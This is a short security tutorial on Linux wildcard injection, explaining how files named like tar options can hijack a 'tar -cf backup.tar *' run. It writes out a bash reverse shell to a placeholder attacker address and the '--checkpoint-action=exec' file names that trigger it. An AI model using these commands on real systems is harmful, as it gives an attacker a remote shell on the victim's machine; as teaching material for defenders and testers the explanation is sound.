Linux Vulns

Wildcard Injection

Wildcard Injection is an attack that exploits the use of wildcards (*, ?, []) in Linux commands to execute malicious code. This is possible when a user runs commands like tar, rsync, or scp in directories where an attacker has created files with names that resemble command-line options. This can lead to the unintended execution of commands without the user noticing.

An attacker can exploit Wildcard Injection by creating malicious files in a directory where the victim will execute a command using *. For example, they can use:

echo "bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1" > revshell.sh
echo "" > --checkpoint=1
echo "" > "--checkpoint-action=exec=bash revshell.sh"

When the victim runs a command like tar -cf backup.tar *, tar will interpret the filenames as options and execute the code, starting a reverse shell to the attacker.